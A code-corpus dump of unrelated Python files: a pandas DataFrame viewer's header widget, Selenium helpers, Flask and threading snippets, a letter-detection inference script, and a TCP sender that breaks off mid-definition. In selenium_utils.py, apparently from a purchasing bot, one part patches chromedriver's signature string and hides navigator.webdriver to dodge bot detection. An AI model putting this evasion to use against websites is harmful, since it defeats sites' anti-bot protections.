arr = [df.columns[i][level] for i in range(len(df.columns))]
else:
arr = df.columns
# Holds the starting index of a range of equal values.
# None means it is not currently in a range of equal values.
match_start = None
for col in range(1, len(arr)): # Iterates over cells in row
# Check if cell matches cell to its left
if arr[col] == arr[col - 1]:
if match_start is None:
match_start = col - 1
# If this is the last cell, need to end it
if col == len(arr) - 1:
match_end = col
span_size = match_end - match_start + 1
self.setSpan(level, match_start, 1, span_size)
else:
if match_start is not None:
match_end = col - 1
span_size = match_end - match_start + 1
self.setSpan(level, match_start, 1, span_size)
match_start = None
# Find spans for vertical HeaderView
else:
# Find how many levels the MultiIndex has
if isinstance(df.index, pd.MultiIndex):
N = len(df.index[0])
else:
N = 1
for level in range(N): # Iterates over the levels
# Find how many segments the MultiIndex has
if isinstance(df.index, pd.MultiIndex):
arr = [df.index[i][level] for i in range(len(df.index))]
else:
arr = df.index
# Holds the starting index of a range of equal values.
# None means it is not currently in a range of equal values.
match_start = None
for row in range(1, len(arr)): # Iterates over cells in column
# Check if cell matches cell above
if arr[row] == arr[row - 1]:
if match_start is None:
match_start = row - 1
# If this is the last cell, need to end it
if row == len(arr) - 1:
match_end = row
span_size = match_end - match_start + 1
self.setSpan(match_start, level, span_size, 1)
else:
if match_start is not None:
match_end = row - 1
span_size = match_end - match_start + 1
self.setSpan(match_start, level, span_size, 1)
match_start = None
# For the horizontal header, return the column edge the mouse is over
# For the vertical header, return the row edge the mouse is over
def over_header_edge(self, mouse_position, margin=3):
# Return the index of the column this x position is on the right edge of
if self.orientation == Qt.Horizontal:
x = mouse_position
if self.columnAt(x - margin) != self.columnAt(x + margin):
if self.columnAt(x + margin) == 0:
# We're at the left edge of the first column
return None
else:
return self.columnAt(x - margin)
else:
return None
# Return the index of the row this y position is on the top edge of
elif self.orientation == Qt.Vertical:
y = mouse_position
if self.rowAt(y - margin) != self.rowAt(y + margin):
if self.rowAt(y + margin) == 0:
# We're at the top edge of the first row
return None
else:
return self.rowAt(y - margin)
else:
return None
def eventFilter(self, object: QtCore.QObject, event: QtCore.QEvent):
# If mouse is on an edge, start the drag resize process
if event.type() == QtCore.QEvent.MouseButtonPress:
if self.orientation == Qt.Horizontal:
mouse_position = event.pos().x()
else:
mouse_position = event.pos().y()
if self.over_header_edge(mouse_position) is not None:
self.header_being_resized = self.over_header_edge(mouse_position)
self.resize_start_position = mouse_position
if self.orientation == Qt.Horizontal:
self.initial_header_size = self.columnWidth(
self.header_being_resized
)
elif self.orientation == Qt.Vertical:
self.initial_header_size = self.rowHeight(self.header_being_resized)
return True
else:
self.header_being_resized = None
# End the drag process
if event.type() == QtCore.QEvent.MouseButtonRelease:
self.header_being_resized = None
# Auto size the column that was double clicked
if event.type() == QtCore.QEvent.MouseButtonDblClick:
if self.orientation == Qt.Horizontal:
mouse_position = event.pos().x()
else:
mouse_position = event.pos().y()
# Find which column or row edge the mouse was over and auto size it
if self.over_header_edge(mouse_position) is not None:
header_index = self.over_header_edge(mouse_position)
if self.orientation == Qt.Horizontal:
self.dataframe_viewer.auto_size_column(header_index)
elif self.orientation == Qt.Vertical:
self.dataframe_viewer.auto_size_row(header_index)
return True
# Handle active drag resizing
if event.type() == QtCore.QEvent.MouseMove:
if self.orientation == Qt.Horizontal:
mouse_position = event.pos().x()
elif self.orientation == Qt.Vertical:
mouse_position = event.pos().y()
# If this is None, there is no drag resize happening
if self.header_being_resized is not None:
size = self.initial_header_size + (
mouse_position - self.resize_start_position
)
if size > 10:
if self.orientation == Qt.Horizontal:
self.setColumnWidth(self.header_being_resized, size)
self.dataframe_viewer.dataView.setColumnWidth(self.header_being_resized, size)
if self.orientation == Qt.Vertical:
self.setRowHeight(self.header_being_resized, size)
self.dataframe_viewer.dataView.setRowHeight(self.header_being_resized, size)
self.updateGeometry()
self.dataframe_viewer.dataView.updateGeometry()
return True
# Set the cursor shape
if self.over_header_edge(mouse_position) is not None:
if self.orientation == Qt.Horizontal:
self.viewport().setCursor(QtGui.QCursor(Qt.SplitHCursor))
elif self.orientation == Qt.Vertical:
self.viewport().setCursor(QtGui.QCursor(Qt.SplitVCursor))
else:
self.viewport().setCursor(QtGui.QCursor(Qt.ArrowCursor))
return False
# Return the size of the header needed to match the corresponding DataTableView
def sizeHint(self):
# Columm headers
if self.orientation == Qt.Horizontal:
# Width of DataTableView
width = self.table.sizeHint().width() + self.verticalHeader().width()
# Height
height = 2 * self.frameWidth() # Account for border & padding
for i in range(self.model().rowCount()):
height += self.rowHeight(i)
# Index header
else:
# Height of DataTableView
height = self.table.sizeHint().height() + self.horizontalHeader().height()
# Width
width = 2 * self.frameWidth() # Account for border & padding
for i in range(self.model().columnCount()):
width += self.columnWidth(i)
return QtCore.QSize(width, height)
# This is needed because otherwise when the horizontal header is a single row it will add whitespace to be bigger
def minimumSizeHint(self):
if self.orientation == Qt.Horizontal:
return QtCore.QSize(0, self.sizeHint().height())
else:
return QtCore.QSize(self.sizeHint().width(), 0)
class HeaderNamesModel(QtCore.QAbstractTableModel):
def __init__(self, parent, orientation):
super().__init__(parent)
self.orientation = orientation
self.pgdf: PandasGuiDataFrameStore = parent.pgdf
def columnCount(self, parent=None):
if self.orientation == Qt.Horizontal:
return 1
elif self.orientation == Qt.Vertical:
return self.pgdf.df.index.nlevels
def rowCount(self, parent=None):
if self.orientation == Qt.Horizontal:
return self.pgdf.df.columns.nlevels
elif self.orientation == Qt.Vertical:
return 1
def data(self, index, role=QtCore.Qt.DisplayRole):
row = index.row()
col = index.column()
if role == QtCore.Qt.DisplayRole or role == QtCore.Qt.ToolTipRole:
if self.orientation == Qt.Horizontal:
val = self.pgdf.df.columns.names[row]
if val is None:
val = ""
return str(val)
elif self.orientation == Qt.Vertical:
val = self.pgdf.df.index.names[col]
if val is None:
val = "index"
return str(val)
if role == QtCore.Qt.DecorationRole:
if self.pgdf.sort_state == "Asc":
icon = QtGui.QIcon(os.path.join(pandasgui.__path__[0], "resources/images/sort-ascending.svg"))
elif self.pgdf.sort_state == "Desc":
icon = QtGui.QIcon(os.path.join(pandasgui.__path__[0], "resources/images/sort-descending.svg"))
else:
return
if col == self.pgdf.sorted_index_level and self.orientation == Qt.Vertical:
return icon
class HeaderNamesView(QtWidgets.QTableView):
def __init__(self, parent: DataFrameViewer, orientation):
super().__init__(parent)
self.dataframe_viewer = parent
self.pgdf: PandasGuiDataFrameStore = parent.pgdf
self.setProperty('orientation', 'horizontal' if orientation == 1 else 'vertical') # Used in stylesheet
# Setup
self.orientation = orientation
self.setModel(HeaderNamesModel(parent, orientation))
self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.setHorizontalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
self.setVerticalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
self.horizontalHeader().hide()
self.verticalHeader().hide()
self.setSelectionMode(self.NoSelection)
font = QtGui.QFont()
font.setBold(True)
self.setFont(font)
self.init_size()
def mouseDoubleClickEvent(self, event):
point = event.pos()
ix = self.indexAt(point)
if event.button() == QtCore.Qt.LeftButton:
if self.orientation == Qt.Vertical:
self.pgdf.sort_index(ix.column())
else:
super().mouseDoubleClickEvent(event)
def init_size(self):
# Match vertical header name widths to vertical header
if self.orientation == Qt.Vertical:
for ix in range(self.model().columnCount()):
self.setColumnWidth(ix, self.columnWidth(ix))
def sizeHint(self):
if self.orientation == Qt.Horizontal:
width = self.columnWidth(0)
height = self.dataframe_viewer.columnHeader.sizeHint().height()
else: # Vertical
width = self.dataframe_viewer.indexHeader.sizeHint().width()
height = self.rowHeight(0) + 2
return QtCore.QSize(width, height)
def minimumSizeHint(self):
return self.sizeHint()
def rowHeight(self, row: int) -> int:
return self.dataframe_viewer.columnHeader.rowHeight(row)
def columnWidth(self, column: int) -> int:
if self.orientation == Qt.Horizontal:
if all(name is None for name in self.pgdf.df.columns.names):
return 0
else:
return super().columnWidth(column)
else:
return self.dataframe_viewer.indexHeader.columnWidth(column)
# This is a fixed size widget with a size that tracks some other widget
class TrackingSpacer(QtWidgets.QFrame):
def __init__(self, ref_x=None, ref_y=None):
super().__init__()
self.ref_x = ref_x
self.ref_y = ref_y
def minimumSizeHint(self):
width = 0
height = 0
if self.ref_x:
width = self.ref_x.width()
if self.ref_y:
height = self.ref_y.height()
return QtCore.QSize(width, height)
# Examples
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
from pandasgui.datasets import pokemon
view = DataFrameViewer(pokemon)
view.show()
app.exec_()
|
selenium_utils.py | from chromedriver_py import binary_path as driver_path
from selenium.webdriver import DesiredCapabilities
from selenium.webdriver import Chrome, ChromeOptions # TODO: Combine these two dependencies. Leaving it for now since it touches too many sites atm.
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support.wait import WebDriverWait
from utils import create_msg
import random, re, requests, string, threading
# https://github.com/Hari-Nagarajan/nvidia-bot/blob/master/utils/selenium_utils.py
options = Options()
options.add_experimental_option(
"excludeSwitches", ["enable-automation", "enable-logging"]
)
options.add_experimental_option("useAutomationExtension", False)
class AnyEc:
"""Use with WebDriverWait to combine expected_conditions
in an OR.
"""
def __init__(self, *args):
self.ecs = args
def __call__(self, driver):
for fn in self.ecs:
try:
if fn(driver):
return True
except:
pass
def no_amazon_image():
prefs = {"profile.managed_default_content_settings.images": 2}
options.add_experimental_option("prefs", prefs)
def yes_amazon_image():
prefs = {"profile.managed_default_content_settings.images": 0}
options.add_experimental_option("prefs", prefs)
def wait_for_element(d, e_id, time=30):
"""
Uses webdriver(d) to wait for page title(title) to become visible
"""
return WebDriverWait(d, time).until(ec.presence_of_element_located((By.ID, e_id)))
def wait_for_element_by_xpath(d, e_path, time=30):
return WebDriverWait(d, time).until(
ec.presence_of_element_located((By.XPATH, e_path))
)
def wait_for_element_by_class(d, e_class, time=30):
"""
Uses webdriver(d) to wait for page title(title) to become visible
"""
return WebDriverWait(d, time).until(
ec.presence_of_element_located((By.CLASS_NAME, e_class))
)
def wait_for_title(d, title, path):
"""
Uses webdriver(d) to navigate to get(path) until it equals title(title)
"""
while d.title != title:
d.get(path)
WebDriverWait(d, 1000)
def wait_for_page(d, title, time=30):
"""
Uses webdriver(d) to wait for page title(title) to become visible
"""
WebDriverWait(d, time).until(ec.title_is(title))
def wait_for_either_title(d, title1, title2, time=30):
"""
Uses webdriver(d) to wait for page title(title1 or title2) to become visible
"""
try:
WebDriverWait(d, time).until(AnyEc(ec.title_is(title1), ec.title_is(title2)))
except Exception:
pass
def wait_for_any_title(d, titles, time=30):
"""
Uses webdriver(d) to wait for page title(any in the list of titles) to become visible
"""
WebDriverWait(d, time).until(AnyEc(*[ec.title_is(title) for title in titles]))
def button_click_using_xpath(d, xpath):
"""
Uses webdriver(d) to click a button using an XPath(xpath)
"""
button_menu = WebDriverWait(d, 10).until(
ec.element_to_be_clickable((By.XPATH, xpath))
)
action = ActionChains(d)
action.move_to_element(button_menu).pause(1).click().perform()
def field_send_keys(d, field, keys):
"""
Uses webdriver(d) to fiend a field(field), clears it and sends keys(keys)
"""
elem = d.find_element_by_name(field)
elem.clear()
elem.send_keys(keys)
def has_class(element, class_name):
classes = element.get_attribute("class")
return class_name in classes
def add_cookies_to_session_from_driver(driver, session):
cookies = driver.get_cookies()
[
session.cookies.set_cookie(
requests.cookies.create_cookie(
domain=cookie["domain"],
name=cookie["name"],
value=cookie["value"],
)
)
for cookie in cookies
]
def enable_headless():
options.add_argument("--headless")
options.add_argument("--no-sandbox")
options.add_argument("--disable-dev-shm-usage")
# https://stackoverflow.com/questions/33225947/can-a-website-detect-when-you-are-using-selenium-with-chromedriver
def change_driver(status_signal, loc):
fin = open(loc, 'rb')
data = fin.read()
val = "$" + "".join(random.choices(string.ascii_lowercase, k=3)) + "_" + \
"".join(random.choices(string.ascii_letters + string.digits, k=22)) + "_"
result = re.search(b"[$][a-z]{3}_[a-zA-Z0-9]{22}_", data)
if result is not None:
status_signal.emit(create_msg("Changing value in Chromedriver", "normal"))
data = data.replace(result.group(0), val.encode())
fin.close()
fin = open(loc, 'wb')
fin.truncate()
fin.write(data)
fin.close()
else:
fin.close()
def open_browser(link, cookies):
threading.Thread(target=start_browser, args=(link, cookies)).start()
def start_browser(link, cookies):
caps = DesiredCapabilities().CHROME
caps["pageLoadStrategy"] = "eager"
chrome_options = ChromeOptions()
chrome_options.add_experimental_option("excludeSwitches", ["enable-automation"])
chrome_options.add_experimental_option("useAutomationExtension", False)
driver = Chrome(desired_capabilities=caps, executable_path=driver_path, options=chrome_options)
driver.execute_cdp_cmd(
"Page.addScriptToEvaluateOnNewDocument",
{
"source": """
Object.defineProperty(window, 'navigator', {
value: new Proxy(navigator, {
has: (target, key) => (key === 'webdriver' ? false : key in target),
get: (target, key) =>
key === 'webdriver'
? undefined
: typeof target[key] === 'function'
? target[key].bind(target)
: target[key]
})
})
"""
},
)
driver.get(link)
for cookie in cookies:
driver.add_cookie({
"name": cookie["name"],
"value": cookie["value"],
"domain": cookie["domain"]
})
driver.get(link)
|
__main__.py | import threading
from HomeTuner import setup_logging, scan, init_assets, create_app, control
setup_logging()
init_assets()
scanner = threading.Thread(target=scan.main, args=[])
scanner.start()
app = create_app()
app.run(host='0.0.0.0', threaded=True) |
example1.py | # ch13/ch01_ex01.py
import threading
def writer():
global text
while True:
with resource:
print(f'Writing being done by {threading.current_thread().name}.')
text += f'Writing was done by {threading.current_thread().name}. '
def reader():
global rcount
while True:
with rcounter:
rcount += 1
if rcount == 1:
resource.acquire()
print(f'Reading being done by {threading.current_thread().name}:')
print(text)
with rcounter:
rcount -= 1
if rcount == 0:
resource.release()
text = 'This is some text. '
rcount = 0
rcounter = threading.Lock()
resource = threading.Lock()
threads = [threading.Thread(target=reader) for i in range(3)] + [threading.Thread(target=writer) for i in range(2)]
for thread in threads:
thread.start()
|
email.py | from threading import Thread
from flask import current_app
from flask_mail import Message
from myapp import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body, attachments=None, sync=False):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
if attachments:
for attachment in attachments:
msg.attach(*attachment)
if sync:
mail.send(msg)
else:
Thread(target=send_async_email, args=(current_app._get_current_object(), msg)).start() |
inference.py | import matplotlib.pyplot as plt
from PIL import Image,ImageDraw
import math
import glob
import os
import datetime
import numpy as np
from chainer import serializers
from chainercv.datasets import voc_bbox_label_names
from chainercv.links import FasterRCNNVGG16
from chainercv.links import SSD512
from chainercv.links import SSD300
from chainercv.utils import read_image
from chainercv.visualizations import vis_bbox
import cv2
import cv2 as cv
from collections import deque
import time
import multiprocessing
import concurrent.futures as confu
# model_name = 'model/2020_6_2.npz'
# model_name = 'model/2020_7_2.npz'
model_name = 'model/2020_9_18.npz'
result_path = "majomoji/inference/result"
color = [255.0, .0, .0]
# 推論実行するやつ
def run(img,model):
bboxes, labels, scores = model.predict([img])
# 整数値をとりたいのでここで成形する
take_bboxes=[]
for i in range(len(bboxes[0])):
y0=math.floor(bboxes[0][i][0])
x0=math.floor(bboxes[0][i][1])
y1=math.ceil(bboxes[0][i][2])
x1=math.ceil(bboxes[0][i][3])
bbox=[y0,x0,y1,x1]
take_bboxes.append(bbox)
take_bboxes=np.array(take_bboxes,'f')
return take_bboxes, labels[0], scores[0]
# 並列推論
def multi_run(img,model,send_rev,rad,center):
bboxes, labels, scores = model.predict([img])
# 整数値をとりたいのでここで成形する
take_bboxes=[]
for i in range(len(bboxes[0])):
y0=math.floor(bboxes[0][i][0])
x0=math.floor(bboxes[0][i][1])
y1=math.ceil(bboxes[0][i][2])
x1=math.ceil(bboxes[0][i][3])
bbox=[y0,x0,y1,x1]
take_bboxes.append(bbox)
take_bboxes=np.array(take_bboxes,'f')
take_bboxes = moldingrotation(rad,center,take_bboxes)
send_rev.send([take_bboxes, labels[0], scores[0]])
# return take_bboxes, labels[0], scores[0]
def multi_run2(img,model,rad,center):
bboxes, labels, scores = model.predict([img])
# 整数値をとりたいのでここで成形する
take_bboxes=[]
for i in range(len(bboxes[0])):
y0=math.floor(bboxes[0][i][0])
x0=math.floor(bboxes[0][i][1])
y1=math.ceil(bboxes[0][i][2])
x1=math.ceil(bboxes[0][i][3])
bbox=[y0,x0,y1,x1]
take_bboxes.append(bbox)
take_bboxes=np.array(take_bboxes,'f')
take_bboxes = moldingrotation(rad,center,take_bboxes)
return take_bboxes, labels[0], scores[0]
# ひとつの画像に対して推論をする場所
def take_image(img_path):
# 画像をとる
img = read_image(img_path)
# 推論実行
majomoji_label="A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"
model = SSD512(n_fg_class=len(majomoji_label))
serializers.load_npz(model_name,model)
bboxes, labels, scores = run(img,model)
vis_bbox(img, bboxes, labels, scores,
label_names=majomoji_label)
plt.show()
return bboxes,labels,scores
# 疑似Main文
def start_inference():
# まず今回の結果を保存するためのフォルダを生成する
dt_now=datetime.datetime.now()
folder_name=result_path+'/{}_{}_{}'.format(dt_now.year,dt_now.month,dt_now.day)
if not os.path.exists(folder_name):
os.mkdir(folder_name)
# フォルダ内の全てに対して推論を行う
all_img_path=glob.glob("majomoji/inference/Image/*")
for img_path in all_img_path:
print('inference ... [' , img_path , ']')
bboxes,labels,scores = take_image(img_path)
# txtに保持
img_name = img_path.split('\\')[-1].split('.')[0]
print(img_name)
path_and_name = folder_name+'/'+img_name+'.txt'
with open(path_and_name,mode='w') as f:
f.write('{}\n'.format(bboxes))
f.write('{}\n'.format(labels))
f.write('{}\n'.format(scores))
return 0
# 提案領域とか文字を書き込む関数
def dwar_frame(bboxes,labels,img):
for box in bboxes:
# 1box = 4座標
x0 = int(box[0])
x1 = int(box[2])
y0 = int(box[1])
y1 = int(box[3])
# 横
for x in range(int(x1)-int(x0)):
for i in range(3):
img[i][x0+x][y0] = color[i]
img[i][x0+x][y1] = color[i]
# 縦
for y in range(y1-y0):
for i in range(3):
img[i][x0][y0+y] = color[i]
img[i][x1][y0+y] = color[i]
# opencvで扱えるように変換
img = trans_img_cv2(img)
majomoji_label=["A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"]
for i in range(len(labels)):
# 文字書き込み
cv.putText(img, majomoji_label[labels[i]],
(bboxes[i][1], bboxes[i][2]),
cv.FONT_HERSHEY_PLAIN, 5, color, 5, cv.LINE_AA)
return img
def trans_img_cv2(img):
buf = np.asanyarray(img, dtype=np.uint8).transpose(1, 2, 0)
dst = cv2.cvtColor(buf, cv2.COLOR_RGB2BGR)
return dst
def discord_inf(png):
img = read_image(png)
# 学習済みmodelを渡す
majomoji_label="A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"
model = SSD512(n_fg_class=len(majomoji_label))
# model のロード
serializers.load_npz(model_name,model)
# 推論の実行
bboxes, labels, scores = run(img,model)
print("推論終了")
# 加工も行って画像を返す
# [(RGB),(y),(x)]
# 線入れ関数
d_img = dwar_frame(bboxes,labels,img)
cv2.imwrite("fin_inf.jpg",d_img)
# PIL型 -> OpenCV型
def pil2cv(image):
new_image = np.array(image, dtype=np.uint8)
if new_image.ndim == 2: # モノクロ
pass
elif new_image.shape[2] == 3: # カラー
new_image = cv2.cvtColor(new_image, cv2.COLOR_RGB2BGR)
elif new_image.shape[2] == 4: # 透過
new_image = cv2.cvtColor(new_image, cv2.COLOR_RGB2BGR)
return new_image
# OpenCV型 -> PIL型
def cv2pil(image):
new_image = image.copy()
if new_image.ndim == 2: # モノクロ
pass
elif new_image.shape[2] == 3: # カラー
new_image = cv2.cvtColor(new_image, cv2.COLOR_BGR2RGB)
elif new_image.shape[2] == 4: # 透過
new_image = cv2.cvtColor(new_image, cv2.COLOR_BGR2RGB)
new_image = Image.fromarray(new_image)
return new_image
# PIL型 -> ChainerCV型
def pilccv(pilimg):
img = np.asarray(pilimg, dtype=np.float32)
# transpose (H, W, C) -> (C, H, W)
return img.transpose((2, 0, 1))
def molrot(_rad,cy,cx,y,x):
rad = math.atan2(y-cy,x-cx)
distance = math.sqrt((x-cx)*(x-cx)+(y-cy)*(y-cy))
# 移動後の座標を出して返す
_y = math.ceil(math.sin(rad+_rad) * distance + cy)
_x = math.ceil(math.cos(rad+_rad) * distance + cx)
return _y,_x
# 回転をいい感じに戻す処理部
def moldingrotation(_radian,center,bboxes):
new_bboxes = []
for bbox in bboxes:
# デフォで何°ずれているのか計算
y0,x0,y1,x1 = bbox
# print("変換前 : ",bbox)
# 各点に対して移動処理(8座標出現するかも)
ay0,ax0 = molrot(_radian,center[0],center[1],y0,x0)
ay1,ax1 = molrot(_radian,center[0],center[1],y0,x1)
ay2,ax2 = molrot(_radian,center[0],center[1],y1,x0)
ay3,ax3 = molrot(_radian,center[0],center[1],y1,x1)
# これらを内包する最小矩形を錬成する
miny = min(ay0,ay1,ay2,ay3)
maxy = max(ay0,ay1,ay2,ay3)
minx = min(ax0,ax1,ax2,ax3)
maxx = max(ax0,ax1,ax2,ax3)
new_bboxes.append([miny,minx,maxy,maxx])
# print("返還後 : ","(",ay0,ax0,")","(",ay1,ax1,")","(",ay2,ax2,")","(",ay3,ax3,")")
# print()
# print()
# print()
return new_bboxes
# iou計算部分
def IoU(area1,area2,score = 0.2):
y0,x0,y1,x1 = area1
y2,x2,y3,x3 = area2
# 片方図形内に頂点が存在できない場合に”重複しない”ことになる
ymin,ymax = min(y0,y1),max(y0,y1)
xmin,xmax = min(x0,x1),max(x0,x1)
_ymin,_ymax = min(y2,y3),max(y2,y3)
_xmin,_xmax = min(x2,x3),max(x2,x3)
# yの内包状態
y_inclusion = ((ymin<=y2 and y2<=ymax) or (ymin<=y3 and y3<=ymax)) or \
((_ymin<=y0 and y0<=_ymax) or (_ymin<=y1 and y1<=_ymax))
x_inclusion = ((xmin<=x2 and x2<=xmax) or (xmin<=x3 and x3<=xmax)) or \
((_xmin<=x0 and x0<=_xmax) or (_xmin<=x1 and x1<=_xmax))
if y_inclusion and x_inclusion:
# 重複する場合
AoO = (min(xmax,_xmax)-max(xmin,_xmin))*(min(ymax,_ymax)-max(_ymin,ymin))
AoU = (xmax-xmin)*(ymax-ymin)+(_xmax-_xmin)*(_ymax-_ymin)-AoO
return ((AoO/AoU) <= score)
return True
# 重複削除部
def NMS(informations):
# 重複を除いたものだけを返すものを作る
bboxes,labels = [],[]
next_queue = deque([])
queue = deque(informations)
res = []
while len(queue) > 0:
# まず先頭要素を基準に採る
score,bbox,label = queue.popleft()
bboxes.append(bbox)
labels.append(label)
# 残り要素をpopしながら比較する
while len(queue) > 0:
# 比較要素を採る
_score,_bbox,_label = queue.popleft()
# IoUを基準に、消すかどうか考える
if IoU(bbox,_bbox):
# 重複していない別要素なので残す
next_queue.append([_score,_bbox,_label])
# queue全部見終わったらqueue←next
if len(next_queue) > 0:
queue = next_queue
next_queue = deque([])
return bboxes,labels
def highclassinference(png):
# 20°づつ回転させながら推論、その後元座標に全部変換し、重なった領域に対して最も信頼度が高いもののみを選ぶ
# 回転させるのでまずは√2倍した下地を作る
default_image = Image.open(png)
w,h = default_image.size
xy = math.ceil(w * math.sqrt(2))
new_img = img=np.zeros((xy, xy, 3), np.uint8)
# 貼り付ける
img = img=np.zeros((xy, xy, 3), np.uint8)
img[:,:,0:3]=[255,255,255]
img = pil2cv(img)
def_img = pil2cv(default_image)
_xy = (xy-w)//2
img[_xy:_xy+h,_xy:_xy+w] = def_img
img = cv2pil(img)
# 回転計算用変数の準備
center = [xy/2,xy/2]
# 学習済みmodelを渡す
majomoji_label="A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"
model = SSD512(n_fg_class=len(majomoji_label))
f_img = pilccv(img)
# model のロード
serializers.load_npz(model_name,model)
informations = []
runtime = time.time()
jobs = []
pipe_list = []
# 18パターンの推論を回す処理
for i in range(18):
get_rev,send_rev = multiprocessing.Pipe(False)
deg = i*20
rad = math.radians(deg)
rot = img.rotate(deg,fillcolor=(255, 255, 255))
rot = pilccv(rot)
p = multiprocessing.Process(target=multi_run, args=(rot,model,send_rev,rad,center))
jobs.append(p)
pipe_list.append(get_rev)
p.start()
# /- 単一推論処理 -/
# bboxes, labels, scores = run(rot,model)
# for k in range(len(bboxes)):
# informations.append([scores[k],bboxes[k],labels[k]])
# /- 角度毎の推論 -/
# d_img = dwar_frame(bboxes,labels,f_img)
# cv2.imwrite("rot_test"+str(i*20)+".png",d_img)
# all_bboxes.append(bboxes)
# all_labels.append(labels)
# 受け取り判定
for proc in jobs:
proc.join()
result_list = [x.recv() for x in pipe_list]
# 受け取り後に成型
for i in result_list:
for k in range(len(i[0])):
informations.append([i[2][k],i[0][k],i[1][k]])
d_runtime = time.time() - runtime
print("run : ",d_runtime," sec")
nmstime = time.time()
informations.sort(key=lambda x: x[0])
bboxes,labels = NMS(informations)
d_nmstime = time.time() - nmstime
print("nms : ",d_nmstime," sec")
img = pilccv(img)
img = dwar_frame(bboxes,labels,img)
# cv2.imwrite("iou_test_0.png",img)
# discord用出力
cv2.imwrite("fin_inf.jpg",img)
print("finish")
def futures_inf(png):
# 20°づつ回転させながら推論、その後元座標に全部変換し、重なった領域に対して最も信頼度が高いもののみを選ぶ
# 回転させるのでまずは√2倍した下地を作る
default_image = Image.open(png)
w,h = default_image.size
xy = math.ceil(w * math.sqrt(2))
new_img = img=np.zeros((xy, xy, 3), np.uint8)
# 貼り付ける
img = img=np.zeros((xy, xy, 3), np.uint8)
img[:,:,0:3]=[255,255,255]
img = pil2cv(img)
def_img = pil2cv(default_image)
_xy = (xy-w)//2
img[_xy:_xy+h,_xy:_xy+w] = def_img
img = cv2pil(img)
# 回転計算用変数の準備
center = [xy/2,xy/2]
# 学習済みmodelを渡す
majomoji_label="A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"
model = SSD512(n_fg_class=len(majomoji_label))
f_img = pilccv(img)
# model のロード
serializers.load_npz(model_name,model)
informations = []
runtime = time.time()
# 18パターンの画像を作る
rot_img = []
for i in range(18):
deg = i*20
rad = math.radians(deg)
rot = img.rotate(deg,fillcolor=(255, 255, 255))
rot = pilccv(rot)
rot_img.append([rot,rad])
# 並列実行
with confu.ProcessPoolExecutor(max_workers=os.cpu_count()) as executor:
futures = [executor.submit(multi_run2,x[0],model,x[1],center) for x in rot_img]
(done, notdone) = confu.wait(futures)
for future in confu.as_completed(futures):
bboxes, labels, scores = future.result()
for k in range(len(bboxes)):
informations.append([scores[k],bboxes[k],labels[k]])
d_runtime = time.time() - runtime
print("run : ",d_runtime," sec")
nmstime = time.time()
informations.sort(key=lambda x: x[0])
bboxes,labels = NMS(informations)
d_nmstime = time.time() - nmstime
print("nms : ",d_nmstime," sec")
img = pilccv(img)
img = dwar_frame(bboxes,labels,img)
# cv2.imwrite("iou_test_0.png",img)
# discord用出力
cv2.imwrite("fin_inf.jpg",img)
print("finish")
def test():
a = 0
f = 10000000*3
for i in range(f):
a += 1
def main():
start = time.time()
# test()
futures_inf("84.PNG")
d_time = time.time() - start
print("total : ",d_time," sec")
# start_inference()
# 推論させたい画像の選択
# img = read_image('majomoji/Image/test016.PNG')
# 学習済みmodelを渡す
# majomoji_label="A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"
# model = SSD512(n_fg_class=len(majomoji_label))
# model のロード
# serializers.load_npz('model/2020_3_30_con.npz',model)
# serializers.load_npz('model/2020_5_27.npz',model)
# 推論の実行
# bboxes, labels, scores = run(img,model)
# vis_bbox(img, bboxes, labels, scores,
# label_names=majomoji_label)
# plt.show()
if __name__ == '__main__':
main() |
TCPSender.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = "Jonathan Cheseaux"
__copyright__ = "Copyright 2014"
__credits__ = ["Jonathan Cheseaux", "Stefano Rosati", "Karol Kruzelecki"]
__license__ = "MIT"
__email__ = "cheseauxjonathan@gmail.com"
import socket
import time
from threading import Thread
import threading
class TCPSender(Thread):
"""This class implements a TCP connection between
the plane and the base station.
"""
def __init__(self, ip='192.168.100.92', port=8080):
Thread.__init__(self)
self.message_buffer = []
self.ip = ip
self.port = port
self.connected = False
self.reconnecting = False
self.s = None
def run(self):
self.connected = False
self.connect()
def connect(self):
"""Connects to the server (base station) """
print "Connecting to server..."
while not self.connected:
try:
self.reconnecting = True
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect((self.ip, self.port))
self.connected = True
self.reconnecting = False
print "Connection established"
self.send_keepalive()
while not len(self.message_buffer) == 0:
#the message will be buffered if a disconnection happens again
#so we can safely remove the message from the buffer from now
msg = self.message_buffer.pop()
print "Sending buffered message (remaining : %d" % len(self.message_buffer)
self.send(msg)
except socket.error, err:
print "Trying to connect again in 5 seconds"
time.sleep(5)
self.s.close()
self.connected = False
self.reconnecting = True
def send_keepalive(self):
"""KEEPALIVE message are required in order to detect quickly
a disconnection between the plane and the base station.
False positive can arise from this system, and the tolerance
(time between successive KEEPALIVE message) need to be
adjusted on both the server (server/ThreadedServer.py) and
the following timer (setted to 3 by default)
"""
self.send("KEEPALIVE")
threading.Timer(3, self.send_keepalive).start()
def receive(self):
""" Reads the socket's inputstream for received message"""
if not self.connected:
return None
data = self.s.recv(1024)
if data:
instructions = data.split("\n")
if data.lower().startswith("[routing]"):
(header, lat,lon,radius) = data.split("\t")
return (header, lat, lon, radius)
return None
def send(self, message, retry=False):
"""
